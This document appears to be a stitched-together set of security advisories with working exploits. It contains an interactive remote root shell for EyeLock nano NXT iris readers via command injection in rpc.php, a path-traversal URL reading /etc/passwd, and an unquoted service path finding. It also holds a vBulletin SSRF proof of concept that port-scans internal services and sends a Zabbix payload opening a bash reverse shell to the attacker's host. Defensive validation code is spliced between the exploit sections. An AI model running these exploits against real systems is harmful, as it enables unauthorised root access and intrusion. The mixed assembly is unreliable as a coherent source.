#!/usr/bin/env python
#
#
# EyeLock nano NXT 3.5 Remote Root Exploit
#
#
# Vendor: EyeLock, LLC
# Product web page: http://www.eyelock.com
# Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
# NXT Firmware: 3.04.1108 (ICM: 3.4.13)
# NXT Firmware: 3.03.944 (ICM: 3.3.2)
# NXT Firmware: 3.01.646 (ICM: 3.1.13)
#
# Platform: Hardware (Biometric Iris Reader (master))
#
# EyeLock is an advanced iris authentication and recognition solutions company
# focused on developing next-generation systems for global access control and identity
# management.
#
# Summary: nano NXT® - the next generation of EyeLock’s revolutionary access
# control solutions. nano NXT renders all other access control peripherals
# obsolete by revolutionizing how identities are protected, authenticated,
# and managed. With a sleek low profile and powerful capabilities, the nano
# NXT redefines the future of access control. An optional SDK is available
# to customers who want to customize their security solutions to integrate
# seamlessly with existing applications. The nano NXT authenticates up to 20
# people per minute, in-motion and at-a-distance with unparalleled accuracy.
# nano NXT can be used in a variety of environments including commercial/enterprise,
# corrections, data centers, education, financial services, government, healthcare
# facilities and hospitality.
#
# Nano NXT is the most advanced compact iris-based identity authentication device
# in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
# Nano NXT is a miniaturized iris-based recognition system capable of providing
# real-time identification, both in-motion and at a distance. The Nano NXT is an
# ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
# secured entrances, server rooms and any other physical space. Similarly the device
# is powerful and compact enough to secure high-value transactions, critical databases,
# network workstations or any other information system.
#
# Desc: EyeLock's nano NXT firmware, latest version 3.5 (released 25.07.2016), suffers
# from multiple unauthenticated command injection vulnerabilities. The issue lies
# within the 'rpc.php' script located in the '/scripts' directory and can be triggered
# when user-supplied input is not correctly sanitized while updating the device's local
# time and/or fetching the time from a remote time server. The vulnerable script has two
# REQUEST parameters, 'timeserver' and 'localtime', that are interpolated into a shell_exec()
# call for setting the local time and the hardware clock of the device. An attacker can exploit
# these conditions to gain full system (root) access and execute OS commands on the affected
# device by injecting shell metacharacters into the affected parameters, bypassing
# the access control in place.
#
# Hint: Plenty of other RCE bugs are present in rpc.php and in other scripts (e.g. uploadCertificate.php,
# upgrade.php, WebConfig.php, firmwareupdate.php, interfaceeditor.php, etc.)
#
# =============================================================================
# /scripts/rpc.php:
# -----------------
# 9: if (isset($_REQUEST['action']))
# 10: {
# 11: switch($_REQUEST['action'])
# ...
# ...
# 181: case 'updatetime':
# 182: {
# 183: // do something, the put our response in the response field...
# 184: $strDate = shell_exec("rdate -s {$_REQUEST['timeserver']} 2>&1");
# 185:
# 186: // set the hardware clock.
# 187: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 188:
# 189: $strtheDate = shell_exec("date 2>&1");
# 190:
# 191: echo "updatetime|{$strDate}|{$strtheDate}";
# 192:
# 193: break;
# 194: }
# 195:
# 196: case 'updatelocaltime':
# 197: {
# 198: // do something, the put our response in the response field...
# 199: $strDate = shell_exec("date -s '{$_REQUEST['localtime']}' 2>&1");
# 200:
# 201: // set the hardware clock
# 202: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
# 203:
# 204: $strtheDate = shell_exec("date 2>&1");
# 205:
# 206: echo "updatelocaltime|{$strDate}|{$strtheDate}";
# 207:
# 208: break;
# 209: }
# =============================================================================
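# The following is an added defensive example, not EyeLock's code or the advisory author's: it shows
# the same two handlers with allowlist validation and an argv-style invocation (no shell), which is
# what escapeshellarg() plus strict validation would give in PHP, followed by a triage function that
# flags rpc.php requests in lighttpd access-log lines carrying shell metacharacters in the two
# parameters. The log lines are constructed for the example.

```python
import re
import subprocess
from urllib.parse import urlsplit, parse_qs

# Strict allowlists for the two values rpc.php hands to shell_exec():
# a hostname/IPv4 literal for 'timeserver', a fixed date layout for 'localtime'.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
LOCALTIME_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")

# Characters that have meaning to /bin/sh in the original shell_exec() string;
# used only for log triage below.
SHELL_META_RE = re.compile(r"""[|&;`$<>(){}\\\n'"]""")


def build_updatetime_argv(timeserver):
    """Return the rdate command as an argv list, or None if the value is rejected.
    An argv list never passes through /bin/sh, so metacharacters cannot inject."""
    if not HOSTNAME_RE.match(timeserver):
        return None
    return ["rdate", "-s", timeserver]


def build_updatelocaltime_argv(localtime):
    if not LOCALTIME_RE.match(localtime):
        return None
    return ["date", "-s", localtime]


def run_argv(argv):
    # shell=False is the default; spelled out because it is the point.
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=10)


# lighttpd's default (Apache common) access-log layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

ACTIONS = {"updatetime": "timeserver", "updatelocaltime": "localtime"}


def flag_rpc_injection(log_line):
    """Return a finding when a request to /scripts/rpc.php carries shell metacharacters
    in the parameter that the listing above shows reaching shell_exec(); else None."""
    m = LOG_RE.match(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != "/scripts/rpc.php":
        return None
    q = parse_qs(url.query, keep_blank_values=True)   # percent-decodes the values
    action = q.get("action", [""])[0]
    param = ACTIONS.get(action)
    if param is None:
        return None
    value = q.get(param, [""])[0]
    if SHELL_META_RE.search(value):
        return {"src": m.group("ip"), "action": action, "param": param, "value": value}
    return None


def triage(lines):
    return [f for f in (flag_rpc_injection(l) for l in lines) if f]


# Constructed sample lines: one injection attempt per vulnerable action, one benign request.
SAMPLE_LOGS = [
    '192.168.40.5 - - [10/Jun/2016:12:00:00 +0000] "GET /scripts/rpc.php?action=updatetime&timeserver=%7C%7Cid HTTP/1.1" 200 45',
    '192.168.40.6 - - [10/Jun/2016:12:00:01 +0000] "GET /scripts/rpc.php?action=updatetime&timeserver=pool.ntp.org HTTP/1.1" 200 45',
    '192.168.40.7 - - [10/Jun/2016:12:00:02 +0000] "GET /scripts/rpc.php?action=updatelocaltime&localtime=2016-06-10+12:00:00%26whoami%26 HTTP/1.1" 200 45',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOGS):
        print("suspicious rpc.php call from %(src)s: %(param)s=%(value)r" % finding)
```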
#
# -----------------------------------------------------------------------------
# Master: 192.168.40.1
# Slave: 192.168.40.2
#
# $ eyelock.py 192.168.40.1
#
# root@192.168.40.1:~# id
# uid=0(root) gid=0(root)
#
# root@192.168.40.1:~# cat /home/root/knockd.conf
# [options]
# logfile = /var/log/knockd.log
#
# [openSSH]
# sequence = 1973,1975,2013
# seq_timeout = 15
# command = /usr/sbin/iptables -D INPUT -p tcp --dport 22 -j DROP
# tcpflags = syn
#
# [closeSSH]
# sequence = 91,85,70
# seq_timeout = 5
# command = /usr/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP
# tcpflags = syn
#
#
# root@192.168.40.1:~# exit
#
# $
# -----------------------------------------------------------------------------
#
#
# Tested on: GNU/Linux (armv7l)
# lighttpd/1.4.35
# SQLite/3.8.7.2
# PHP/5.6.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5357
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5357.php
#
#
# 10.06.2016
#
import re,sys,os
import requests
piton = os.path.basename(sys.argv[0])
print '''
---------------------------------------------------------
EyeLock nano NXT <=3.5 [Open Sesame] Remote Root Exploit
Zero Science Lab - http://zeroscience.mk
ZSL-2016-5357
---------------------------------------------------------
'''
if len(sys.argv) < 2:
    print '\n\x20\x20[*] Usage: '+piton+' <ipaddress>\n'
    sys.exit()
ipaddr = sys.argv[1]
print
while True:
    try:
        cmd = raw_input('root@'+ipaddr+':~# ')
        # http://EyelockNxtMasterIP/scripts/rpc.php?action=updatelocaltime&localtime=%26whoami%26
        execute = requests.get('http://'+ipaddr+'/scripts/rpc.php?action=updatetime&timeserver=||'+cmd)
        pattern = re.compile(r'updatetime\|(.*?)\|',re.S|re.M)
        cmdout = pattern.match(execute.text)
        print cmdout.groups()[0].strip()
        print
        if cmd.strip() == 'exit':
            break
    except Exception:
        break
sys.exit()
EyeLock nano NXT 3.5 Local File Disclosure Vulnerability
Vendor: EyeLock, LLC
Product web page: http://www.eyelock.com
Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
NXT Firmware: 3.04.1108 (ICM: 3.4.13)
NXT Firmware: 3.03.944 (ICM: 3.3.2)
NXT Firmware: 3.01.646 (ICM: 3.1.13)
Platform: Hardware (Biometric Iris Reader (master))
Summary: Nano NXT is the most advanced compact iris-based identity authentication device
in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
Nano NXT is a miniaturized iris-based recognition system capable of providing
real-time identification, both in-motion and at a distance. The Nano NXT is an
ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
secured entrances, server rooms and any other physical space. Similarly the device
is powerful and compact enough to secure high-value transactions, critical databases,
network workstations or any other information system.
Desc: nano NXT suffers from a file disclosure vulnerability: input passed through the
'path' parameter of the 'logdownload.php' script is not verified before being used
to read files. This can be exploited to disclose the contents of arbitrary local files.
==================================================================================
/scripts/logdownload.php:
-------------------------
1: <?php
2: header("Content-Type: application/octet-stream");
3: header("Content-Disposition: attachment; filename={$_GET['dlfilename']}");
4: readfile($_GET['path']);
5: ?>
==================================================================================
Tested on: GNU/Linux (armv7l)
lighttpd/1.4.35
SQLite/3.8.7.2
PHP/5.6.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5356
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5356.php
10.06.2016
--
http://192.168.40.1/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
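An added example (not EyeLock's code) of how logdownload.php's two inputs should be handled: the 'path' value is resolved relative to a fixed log directory and checked for containment after symlink resolution, and the 'dlfilename' value, which the listing echoes into a Content-Disposition header unchecked, is reduced to a safe basename. The directory layout in demo() is constructed for the example.

```python
import os
import re
import tempfile


def resolve_download_path(base_dir, requested):
    """Map the user-supplied 'path' value onto a regular file inside base_dir.
    Returns the resolved absolute path, or None if the request escapes base_dir."""
    if not requested or "\x00" in requested:
        return None
    base = os.path.realpath(base_dir)
    # Treat the value as relative to base_dir, then resolve '..' and symlinks
    # before the containment check, so neither traversal nor a planted link escapes.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    try:
        if os.path.commonpath([base, candidate]) != base:
            return None
    except ValueError:          # different drives on Windows
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def sanitize_download_name(name):
    """Strip directory parts and any character that could break or inject a header
    from the 'dlfilename' value before it goes into Content-Disposition."""
    cleaned = re.sub(r"[^A-Za-z0-9._-]", "_", os.path.basename(name or ""))
    return cleaned[:128] or "download.bin"


def safe_read_log(base_dir, requested):
    path = resolve_download_path(base_dir, requested)
    if path is None:
        return None
    with open(path, "rb") as f:
        return f.read()


def demo():
    """Constructed layout: a log directory holding one real log and a symlink that
    points outside it; returns what each kind of request yields."""
    root = tempfile.mkdtemp()
    logs = os.path.join(root, "logs")
    os.mkdir(logs)
    with open(os.path.join(logs, "device.log"), "w") as f:
        f.write("ok\n")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("outside\n")
    os.symlink(os.path.join(root, "secret.txt"), os.path.join(logs, "link.log"))
    return {
        "plain": safe_read_log(logs, "device.log"),
        "traversal": safe_read_log(logs, "../../../../../../../../etc/passwd"),
        "sibling": safe_read_log(logs, "../secret.txt"),
        "symlink": safe_read_log(logs, "link.log"),
    }


if __name__ == "__main__":
    for kind, content in demo().items():
        print("%-10s -> %r" % (kind, content))
```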
EyeLock Myris 3.3.2 SDK Service Unquoted Service Path Privilege Escalation
Vendor: EyeLock, LLC
Product web page: http://www.eyelock.com
Affected version: 3.3.21289.1311
Summary: myris® provides unparalleled security, is portable, lightweight
and is as easy as looking in a mirror. Use myris to quickly and easily
enroll users for EyeLock’s access control products or to grant users
access to corporate domain environments within seconds—users never have
to type their username and password again.
Desc: The application suffers from an unquoted search path issue affecting
the Windows service 'MyrisService' deployed as part of the Myris solution.
This could potentially allow an authorized but non-privileged local user to
execute arbitrary code with elevated privileges on the system. A successful
attempt would require the local user to be able to place their code in the
system root path undetected by the OS or other security applications, where
it could potentially be executed during application startup or reboot. If
successful, the local user's code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5355
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5355.php
10.06.2016
--
C:\Users\joxy>sc qc MyrisService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MyrisService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Eyelock Corporation\MyrisSDK\bin\MyrisService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Myris SDK Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
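An added audit helper (not the advisory author's code) that parses `sc qc` output like the above, decides whether BINARY_PATH_NAME is ambiguous, lists the locations Windows would probe before the intended binary (so their directory ACLs can be reviewed), and emits the `sc config ... binPath=` command that quotes the path. The `sc qc` text is a constructed copy of the output shown above.

```python
import re

# Constructed copy of the `sc qc MyrisService` output shown in the advisory.
SC_QC_OUTPUT = r"""[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MyrisService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Eyelock Corporation\MyrisSDK\bin\MyrisService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Myris SDK Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def unquoted_path_candidates(binary_path_name):
    """For an unquoted BINARY_PATH_NAME containing spaces, list the executables
    Windows would look for before the intended one (the string is split at each
    space and '.exe' appended). An empty list means the configuration is
    unambiguous; otherwise each candidate's parent directory needs an ACL review."""
    p = binary_path_name.strip()
    if not p or p.startswith('"'):
        return []                       # quoted: taken verbatim by the service manager
    parts = p.split(" ")
    candidates = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            break                       # real executable reached; the rest are arguments
        candidates.append(prefix + ".exe")
    return candidates


def quoting_fix(service, path):
    """The remediation: re-register the path with embedded quotes
    (`sc` requires the space after 'binPath=')."""
    return 'sc config %s binPath= "\\"%s\\""' % (service, path)


def audit_service(sc_qc_text):
    fields = parse_sc_qc(sc_qc_text)
    path = fields.get("BINARY_PATH_NAME", "")
    candidates = unquoted_path_candidates(path)
    return {
        "service": fields.get("SERVICE_NAME"),
        "runs_as": fields.get("SERVICE_START_NAME"),
        "vulnerable": bool(candidates),
        "candidates": candidates,
        "fix": quoting_fix(fields.get("SERVICE_NAME", ""), path) if candidates else None,
    }


if __name__ == "__main__":
    result = audit_service(SC_QC_OUTPUT)
    print("%s runs as %s, unquoted path: %s" % (result["service"], result["runs_as"], result["vulnerable"]))
    for c in result["candidates"]:
        print("  would be tried first: %s" % c)
    if result["fix"]:
        print("  fix: %s" % result["fix"])
```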
'''
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-6483
- Release date: 05.08.2016
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF)
vBulletin <= 4.2.3
vBulletin <= 3.8.9
II. BACKGROUND
-------------------------
vBulletin (vB) is a proprietary Internet forum software package developed by
vBulletin Solutions, Inc., a division of Internet Brands.
https://www.vbulletin.com/
https://en.wikipedia.org/wiki/VBulletin
A Google search for "Powered by vBulletin" returns over 19 million sites
that are hosting a vBulletin forum:
https://www.google.co.uk/?gws_rd=ssl#q=%22Powered+by+vBulletin%22
III. INTRODUCTION
-------------------------
vBulletin forum software is affected by a SSRF vulnerability that allows
unauthenticated remote attackers to access internal services (such as mail
servers, memcached, couchDB, zabbix etc.) running on the server hosting
vBulletin as well as services on other servers on the local network that are
accessible from the target.
This advisory provides a PoC exploit that demonstrates how an unauthenticated
attacker could perform a port scan of the internal services as well as execute
arbitrary system commands on a target vBulletin host with a locally installed
Zabbix Agent monitoring service.
IV. DESCRIPTION
-------------------------
vBulletin allows forum users to share media files by uploading them to the
remote server. Some pages allow users to specify a URL to a media file
that a user wants to share, which will then be retrieved by vBulletin.
The user-provided links are validated to make sure that users can only access
resources over the HTTP/HTTPS protocols and that connections to localhost are
not allowed.
These restrictions can be found in core/vb/vurl/curl.php source file:
/**
* Determine if the url is safe to load
*
* @param $urlinfo -- The parsed url info from vB_String::parseUrl -- scheme, port, host
* @return boolean
*/
private function validateUrl($urlinfo)
{
// VBV-11823, only allow http/https schemes
if (!isset($urlinfo['scheme']) OR !in_array(strtolower($urlinfo['scheme']), array('http', 'https')))
{
return false;
}
// VBV-11823, do not allow localhost and 127.0.0.0/8 range by default
if (!isset($urlinfo['host']) OR preg_match('#localhost|127\.(\d)+\.(\d)+\.(\d)+#i', $urlinfo['host']))
{
return false;
}
if (empty($urlinfo['port']))
{
if ($urlinfo['scheme'] == 'https')
{
$urlinfo['port'] = 443;
}
else
{
$urlinfo['port'] = 80;
}
}
// VBV-11823, restrict detination ports to 80 and 443 by default
// allow the admin to override the allowed ports in config.php (in case they have a proxy server they need to go to).
$config = vB::getConfig();
[...]
HTTP redirects are also prohibited; however, there is one place in the vBulletin
codebase that accepts redirects from the target server specified in a
user-provided link.
The code is used to upload media files within a logged-in user's profile and
can normally be accessed under a path similar to:
http://forum/vBulletin522/member/1-mike/media
By specifying a link to a malicious server that returns a 301 HTTP redirect to
the URL of http://localhost:3306 for example, an attacker could easily
bypass the restrictions presented above and make a connection to mysql/3306
service listening on the localhost.
This introduces a Server Side Request Forgery (SSRF) vulnerability.
As curl is used to fetch remote resources, in addition to HTTP, attackers could
specify a handful of other protocols to interact with local services.
For instance, by sending a redirect to gopher://localhost:11211/datahere
attackers could send arbitrary traffic to the memcached service on port 11211.
Additionally, depending on the temporary directory location configured within
the forum, attackers could potentially view the service responses as the
download function stores responses within temporary files which could be
viewed if the temporary directory is exposed on the web server.
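An added example (not vBulletin's code) of the two controls that close the gap described above: validate_url() mirrors the curl.php checks on scheme, host and port, and fetch_with_revalidation() follows redirects itself, re-running that validation on every hop instead of letting the HTTP client follow a 301 to telnet://, gopher:// or localhost. The literal-address check is widened from 127/8 to every non-public range. The `fetch` transport and the redirect chains are constructed stand-ins, not a live network.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}          # curl.php default; config.php may extend it
MAX_REDIRECTS = 3


def validate_url(url, allowed_ports=ALLOWED_PORTS):
    """Port of the validateUrl() checks; returns (ok, reason)."""
    p = urlsplit(url)
    scheme = (p.scheme or "").lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % scheme
    host = (p.hostname or "").lower()
    if not host or host == "localhost" or host.endswith(".localhost"):
        return False, "localhost not allowed"
    try:
        ip = ipaddress.ip_address(host)
        if not ip.is_global:           # loopback, RFC1918, link-local, ...
            return False, "non-public address %s" % ip
    except ValueError:
        pass                           # a hostname; pin the resolved address at connect time
    try:
        port = p.port
    except ValueError:
        return False, "bad port"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in allowed_ports:
        return False, "port %d not allowed" % port
    return True, "ok"


def fetch_with_revalidation(url, fetch, max_redirects=MAX_REDIRECTS):
    """Follow redirects manually so every hop, including ones chosen by the remote
    server, passes validate_url(). `fetch(url)` returns (status, headers, body) and
    must not follow redirects itself (CURLOPT_FOLLOWLOCATION off, protocols limited
    to HTTP/HTTPS)."""
    hops = [url]
    for _ in range(max_redirects + 1):
        ok, reason = validate_url(hops[-1])
        if not ok:
            return {"ok": False, "reason": reason, "hops": hops}
        status, headers, body = fetch(hops[-1])
        if status in (301, 302, 303, 307, 308):
            loc = headers.get("Location")
            if not loc:
                return {"ok": False, "reason": "redirect without Location", "hops": hops}
            hops.append(loc)
            continue
        return {"ok": status == 200, "reason": "status %d" % status, "hops": hops, "body": body}
    return {"ok": False, "reason": "too many redirects", "hops": hops}


# Constructed transport replaying the redirect patterns described in the advisory.
FAKE_NET = {
    "http://redirector.example/22": (301, {"Location": "telnet://localhost:22/"}, b""),
    "http://redirector.example/memcached": (301, {"Location": "gopher://localhost:11211/datahere"}, b""),
    "http://redirector.example/mysql": (301, {"Location": "http://localhost:3306/"}, b""),
    "http://redirector.example/meta": (301, {"Location": "http://169.254.169.254/latest/"}, b""),
    "http://cdn.example/clip.mp4": (200, {}, b"\x00\x00\x00\x18ftypmp42"),
}


def fake_fetch(url):
    return FAKE_NET.get(url, (404, {}, b""))


if __name__ == "__main__":
    for u in FAKE_NET:
        print(u, "->", fetch_with_revalidation(u, fake_fetch)["reason"])
```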
V. PROOF OF CONCEPT EXPLOIT
-------------------------
The exploit code below performs a port scan and demonstrates remote
command execution via the popular Zabbix Agent monitoring service, which may be
listening on local port 10050.
The exploit will execute a reverse bash shell on the target if it has the agent
installed and permits remote commands.
The exploit was verified on the following zabbix agent configuration
(/etc/zabbix/zabbix_agentd.conf):
Server=127.0.0.1,::1
EnableRemoteCommands=1
------------[ vBulletin_SSRF_exploit.py ]-----------
'''
#!/usr/bin/python

intro = """
vBulletin <= 5.2.2 SSRF PoC Exploit (portscan / zabbix agent RCE)
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
installed on the web server that is hosting the vBulletin forum.
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
gives an option to execute a reverse shell (Remote Commands) that will connect
back to the attacker's host on port 8080 by default.
Coded by:
Dawid Golunski
http://legalhackers.com
"""

usage = """
Usage:
The exploit requires that you have an external IP and can start a listener on port 80/443
on the attacking machine.
./vBulletin_SSRF_exploit.py our_external_IP vBulletin_base_url [minimum_port] [maximum_port]
Example invocation that starts listener on 192.168.1.40 (port 80) and scans local ports 1-85
on the remote vBulletin target host:
./vBulletin_SSRF_exploit.py 192.168.1.40 http://vbulletin-target/forum 1 85
Before exploiting Zabbix Agent, start your netcat listener on 8080 port in a separate shell e.g:
nc -vv -l -p 8080
Disclaimer:
For testing purposes only. Do no harm.
SSL/TLS support needs some tuning. For better results, provide HTTP URL to the vBulletin target.
"""

import web # http://webpy.org/installation
import threading
import time
import urllib
import urllib2
import socket
import ssl
import sys


# The listener that will send redirects to the target
class RedirectServer(threading.Thread):
    def run(self):
        urls = ('/([0-9a-z_]+)', 'do_local_redir')
        app = web.application(urls, globals())
        #app.run()
        return web.httpserver.runsimple(app.wsgifunc(), ('0.0.0.0', our_port))


class do_local_redir:
    def GET(self, whereto):
        if whereto == "zabbixcmd_redir":
            # code exec
            # redirect to gopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/our_ip/shell_port 0<&1 2>&1 &') ; sleep 2s]
            return web.HTTPError('301', {'Location': 'gopher://localhost:10050/1system.run%5b(%2Fbin%2Fbash%20-c%20%27nohup%20bash%20-i%20%3E%2Fdev%2Ftcp%2F'+our_ext_ip+'%2F'+str(shell_port)+'%200%3C%261%202%3E%261%20%26%27) %20%3B%20sleep%202s%5d' } )
        else:
            # internal port connection
            return web.HTTPError('301', {'Location': "telnet://localhost:%s/" % whereto} )


def shutdown(code):
    print "\nJob done. Exiting"
    if redirector_started == 1:
        web.httpserver.server.interrupt = KeyboardInterrupt()
    exit(code)


# [ Default settings ]

# reverse shell will connect back to port defined below
shell_port = 8080

# Our HTTP redirector/server port (must be 80 or 443 for vBulletin to accept it)
our_port = 443

# How long to wait (seconds) before considering a port to be opened.
# Don't set it too high to avoid service timeout and an incorrect close state
connect_time = 2

# Default port scan range is limited to 20-90 to speed up things when testing,
# feel free to increase maxport to 65535 here or on the command line if you've
# got the time ;)
minport = 20
maxport = 90

# ignore invalid certs (enable if target forum is HTTPS)
#ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)


# [ Main Meat ]

print intro
redirector_started = 0

if len(sys.argv) < 3:
    print usage
    sys.exit(2)

# Set our HTTP Listener/Redirector's external IP
our_ext_ip = sys.argv[1]
try:
    socket.inet_aton(our_ext_ip)
except socket.error:
    print "Invalid HTTP redirector server IP [%s]!\n" % our_ext_ip
    exit(2)
our_server = "http://%s:%s" % (our_ext_ip, our_port)

# Target forum base URL (e.g. http://vulnerable-vbulletin/forum)
targetforum = sys.argv[2]
# Append vulnerable media upload script path to the base URL
targeturl = targetforum.strip('/') + "/link/getlinkdata"

# Change port range (if provided)
if len(sys.argv) == 5:
    minport = int(sys.argv[3])
    # Finish scanning at maxport
    maxport = int(sys.argv[4])

# Confirm data
print "\n* Confirm your settings\n"
print "Redirect server to listen on: %s:%s\nTarget vBulletin URL: %s\nScan ports between: %d - %d\n" % (our_ext_ip, our_port, targeturl, minport, maxport)
key = raw_input("Are these settings correct? Hit enter to start the port scan... ")

# Connection check
print "\n* Testing connection to vulnerable script at [%s]\n" % targeturl
req = urllib2.Request(targeturl, data=' ', headers={ 'User-Agent': 'Mozilla/5.0' } )
try:
    response = urllib2.urlopen(req, timeout=connect_time).read()
except urllib2.URLError as e:
    print "Invalid forum URI / HTTP request failed (reason: %s)\n" % e.reason
    shutdown(2)

# Server should return 'invalid_url' string if no url provided in POST
if "invalid_url" not in response:
    print """Invalid target url (%s) or restricted access.\n
\nTest with:\n curl -X POST -v %s\nShutting down\n""" % (targeturl, targeturl)
    sys.exit(2)
else:
    print "Got the right response from the URL. The target looks vulnerable!\n"

# [ Start the listener and perform a port scan ]
print "Let's begin!\n"
print "* Starting our redirect base server on %s:%s \n" % (our_ext_ip, our_port)
RedirectServer().start()
redirector_started = 1

print "* Scanning local ports from %d to %d on [%s] target \n" % (minport, maxport, targetforum)
start = time.time()
opened_ports = []
maxport += 1
for targetport in range(minport, maxport):
    #print "\n\nScanning port %d\n" % (targetport)
    fetchurl = '%s/%d' % (our_server, targetport)
    data = urllib.urlencode({'url': fetchurl})
    req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
    try:
        response = urllib2.urlopen(req, timeout=connect_time)
    except urllib2.URLError as e:
        print "Oops, url issue? 403 , 404 etc.\n"
    except (socket.timeout, ssl.SSLError):
        # the target kept the connection open for connect_time seconds: something is listening
        print "Conection opened for %d seconds. Port %d is opened!\n" % (connect_time, targetport)
        opened_ports.append(targetport)

elapsed = (time.time() - start)
print "\nScanning done in %d seconds. \n\n* Opened ports on the target [%s]: \n" % (elapsed, targetforum)
for listening in opened_ports:
    print "Port %d : Opened\n" % listening
print "\nAnything juicy? :)\n"

if 10050 in opened_ports:
    print "* Zabbix Agent was found on port 10050 !\n"

    # [ Command execution via Zabbix Agent to gain a reverse shell ]
    key = raw_input("Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] ")
    if key != 'y':
        shutdown(0)

    print "\n* Executing reverse shell via Zabbix Agent (10050)."
    fetchurl = '%s/%s' % (our_server, 'zabbixcmd_redir')
    data = urllib.urlencode({'url': fetchurl})
    req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
    payload_executed = 0
    try:
        response = urllib2.urlopen(req, timeout=connect_time)
    except urllib2.URLError as e:
        print "Oops, url issue? 403 , 404 etc.\n"
    except (socket.timeout, ssl.SSLError):
        # Agent connection remained opened for 2 seconds after the bash payload was sent,
        # it looks like the sleep 2s shell command must have got executed successfully
        payload_executed = 1

    if payload_executed == 1:
        print "\nLooks like Zabbix Agent executed our bash payload! Check your netcat listening on port %d for shell! :)\n" % shell_port
    else:
        print "\nNo luck. No Zabbix Agent listening on 10050 port or remote commands are disabled :(\n"

shutdown(0)
'''
----------------------[ eof ]------------------------
Example run:
root@trusty:~/vbexploit# ./vBulletin_SSRF_exploit.py 192.168.57.10 http://192.168.57.10/vBulletin522new/ 20 85
vBulletin <= 5.2.2 SSRF PoC Exploit (Localhost Portscan / Zabbix Agent RCE)
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
installed on the web server that is hosting the vBulletin forum.
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
gives an option to execute a reverse shell (Remote Commands) that will connect
back to the attacker's host on port 8080 by default.
Coded by:
Dawid Golunski
http://legalhackers.com
* Confirm your settings
Redirect server to listen on: 192.168.57.10:443
Target vBulletin URL: http://192.168.57.10/vBulletin522new/link/getlinkdata
Scan ports between: 20 - 85
Are these settings correct? Hit enter to start the port scan...
* Testing connection to vulnerable script at [http://192.168.57.10/vBulletin522new/link/getlinkdata]
Got the right response from the URL. The target looks vulnerable!
Let's begin!
* Starting our redirect base server on 192.168.57.10:443
* Scanning local ports from 20 to 85 on [http://192.168.57.10/vBulletin522new/] target
http://0.0.0.0:443/
192.168.57.10:58675 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /20" - 301
192.168.57.10:58679 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /21" - 301
